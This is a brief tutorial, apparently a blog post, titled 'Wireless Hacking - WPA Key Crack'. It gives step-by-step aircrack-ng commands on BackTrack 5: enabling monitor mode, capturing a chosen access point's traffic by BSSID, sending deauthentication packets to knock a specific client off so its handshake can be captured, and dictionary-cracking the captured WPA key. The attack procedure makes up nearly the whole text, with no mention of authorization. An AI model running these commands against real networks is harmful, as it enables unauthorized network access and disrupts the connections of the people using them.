Wireless Hacking - WPA Key Crack

0x00. 환경구성

OS : BackTrack 5 R3 (32-bit)

Kernel : Linux bt 3.2.6

0x01. iwconfig

Configure a wireless network interface.

iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.

# iwconfig

0x02. airmon-ng

airmon-ng is script can be used to enable monitor mode on wireless interfaces.

airmon-ng <start|stop> <interface>

# airmon-ng start wlan0

0x03. airodump-ng

A wireless packet capture tool for aircrack-ng.

airodump-ng [options] <interface>

# airodump-ng mon0

To capture a specific wireless.

[Options]

-c <channel>[,<channel>[, ...]]

--channel <channel>[,<channel>[, ...]]

: Indicate the channel(s) to listen to. By default airodump-ng hop on 2.4GHz channels.

-w <prefix>

--wirte <prefix>

: Is the dump file prefix to use. If this option is not given, it will only show data on the screen. Beside this file a CSV file with the same filename as the capture will be created.

[Filter options]

-d <bssid>

--bssid <bssid>

: It will only show networks, matching the given bssid.

# airodump-ng -c 9 -d 64:e5:99:0f:38:e2 -w  WPA-Key mon0

WPA handshake collection

0x04. aireplay-ng

Inject packets into a wireless network to generate traffic.

aireplay-ng <options> <replay interface>

[Attack modes]

-0 <count>

--deauth=<count>

: This attack sends deauthentication packets to one or more clients which are currently associated with a particular access point.

[Replay options]

-a <bssid>

: Set Access Point MAC address.

-c <dmac>

: Set destination MAC address.

# aireplay-ng -0 10 -a 64:e5:99:0f:38:e2 -c f4:f1:5a:e8:f6:4c mon0

0x05. aircrack-ng

A 802.11 WEP / WPA-PSK Key Cracker.

aircrack-ng [options] <.cap / .ivs file(s)>

# aircrack-ng -w Dict.txt WPA-Key-01.cap